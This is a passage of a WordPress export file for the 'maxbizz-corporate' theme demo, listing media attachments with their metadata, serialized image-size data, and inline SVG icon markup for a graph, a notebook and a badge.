11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>our-vision</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/our-vision/</link>
		<pubDate>Tue, 22 Sep 2020 04:46:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/our-vision.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1029</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:46:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:46:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-vision]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/our-vision.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/our-vision.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:24:"2020/09/our-vision.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"our-vision-1-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"our-vision-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"our-vision-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"our-vision-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"our-vision-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>graph</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/graph/</link>
		<pubDate>Wed, 30 Sep 2020 08:03:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/graph.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1081</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 08:03:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 08:03:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[graph]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/graph.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/graph.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>notebook</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/notebook/</link>
		<pubDate>Wed, 30 Sep 2020 10:00:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/notebook.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1108</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:00:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:00:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[notebook]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/notebook.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/notebook.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/badge/</link>
		<pubDate>Thu, 01 Oct 2020 07:46:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1150</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 07:46:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 07:46:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/badge.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>woocommerce-placeholder</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/woocommerce-placeholder/</link>
		<pubDate>Thu, 01 Oct 2020 10:10:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1163</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:10:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:10:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[woocommerce-placeholder]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/woocommerce-placeholder.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1200;s:6:"height";i:1200;s:4:"file";s:37:"2020/10/woocommerce-placeholder.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-300x300.png";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:5:"large";a:4:{s:4:"file";s:39:"woocommerce-placeholder-1-1024x1024.png";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-768x768.png";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:38:"woocommerce-placeholder-1-1200x600.png";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/pheader-shop/</link>
		<pubDate>Thu, 01 Oct 2020 10:58:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1207</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:58:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:58:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-shop]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/pheader-shop.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/10/pheader-shop.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-shop-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-shop-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-shop-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-shop-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-shop-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-shop-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-shop-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-shop-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-shop-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/project1/</link>
